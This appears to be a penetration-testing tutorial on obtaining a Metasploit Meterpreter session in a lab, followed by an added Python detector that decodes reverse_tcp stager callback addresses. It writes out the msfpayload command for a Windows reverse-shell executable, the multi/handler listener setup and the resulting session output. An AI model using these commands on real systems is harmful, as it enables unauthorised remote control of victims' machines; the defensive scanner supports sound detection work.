Preface
Metasploit is a free, downloadable penetration-testing framework that makes it easy to obtain, develop and run exploit tests against vulnerabilities in computer software. It ships with hundreds of professional-grade exploit modules for known software vulnerabilities.
When H.D. Moore released Metasploit in 2003, the state of computer security was changed permanently. Almost overnight, anyone could become a hacker, and everyone could use attack tools to test vulnerabilities that were unpatched or had only just been patched.
Precisely because the Metasploit team has kept developing exploit modules and contributing them to every Metasploit user, software vendors can no longer put off releasing patches for publicly disclosed vulnerabilities.
This article is an introduction to using Metasploit's tunnelling and proxying features.
0x00 Obtaining a Meterpreter session
1. First, generate the executable
root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X > meter.exe
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 281
Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"}
2. Start msfconsole and listen on the callback port
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console.../

Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]
+ -- --=[ 1386 exploits - 863 auxiliary - 236 post        ]
+ -- --=[ 342 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 444
LPORT => 444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     0.0.0.0          yes       The listen address
   LPORT     444              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler...

3. Run meter.exe on xp-test1; the attacker obtains a Meterpreter session

msf exploit(handler) > run

[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.101.107
[*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - pencS
Hardware MAC : 00:0c:29:ed:cf:d0
MTU          : 1500
IPv4 Address : 10.1.1.128
IPv4 Netmask : 255.255.255.0
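As an added defender-side example (not part of the original article, and not Metasploit's own code): the 281-byte stager generated in step 1 must carry LHOST and LPORT somewhere, and the classic Windows x86 reverse_tcp stager pushes them as two immediates that form a sockaddr_in on the stack (push <IPv4 bytes>; push <AF_INET, port in network byte order>). The Python below scans a byte buffer for that layout and decodes the callback address and port, which is a useful triage step when an unknown executable turns up on a host. The regular expression, the function names and the sample buffer are this example's own; the buffer is a constructed stand-in that contains only the immediates a stager built with the article's LHOST=192.168.101.105 and LPORT=444 would carry, not a real payload.

```python
import re
import struct

# Byte layout of the two immediates the classic x86 reverse_tcp stager pushes
# to build its sockaddr_in on the stack (assumption of this example, based on
# the stager's "push <ip>; push <AF_INET|port>" sequence):
#   68 <4 bytes>          push <LHOST as dotted-quad bytes>
#   68 02 00 <2 bytes>    push <sin_family = AF_INET (2), sin_port big-endian>
STAGER_SOCKADDR = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)


def find_reverse_tcp_callbacks(blob: bytes) -> list[tuple[str, int]]:
    """Return every (ip, port) pair embedded in `blob` in the stager's layout.

    This is a coarse signature: encoded or non-x86 stagers will not match,
    and a 10-byte pattern with only four fixed bytes can occasionally appear
    in unrelated data, so a hit is a lead to confirm, not a verdict.
    """
    hits = []
    for match in STAGER_SOCKADDR.finditer(blob):
        ip = ".".join(str(octet) for octet in match.group(1))
        (port,) = struct.unpack(">H", match.group(2))  # network byte order
        hits.append((ip, port))
    return hits


def scan_file(path: str) -> list[tuple[str, int]]:
    """Convenience wrapper: scan a file on disk (e.g. a suspicious .exe)."""
    with open(path, "rb") as fh:
        return find_reverse_tcp_callbacks(fh.read())


# Constructed sample (hypothetical, not a real payload): filler bytes around
# the immediates for LHOST=192.168.101.105, LPORT=444 (0x01bc).
SAMPLE_BLOB = (
    b"\x90" * 16
    + b"\x68\xc0\xa8\x65\x69"   # push 0x6965a8c0 -> 192.168.101.105
    + b"\x68\x02\x00\x01\xbc"   # push 0xbc010002 -> AF_INET, port 444
    + b"\x89\xe6"               # mov esi, esp (pointer to the sockaddr_in)
    + b"\x00" * 16
)

if __name__ == "__main__":
    for ip, port in find_reverse_tcp_callbacks(SAMPLE_BLOB):
        print(f"reverse_tcp stager callback -> {ip}:{port}")
```

A hit gives the responder the handler address and port to look for in proxy and firewall logs; in the article's setup that would be outbound connections to 192.168.101.105:444, followed by the ~770 KB stage download the handler reports in step 3.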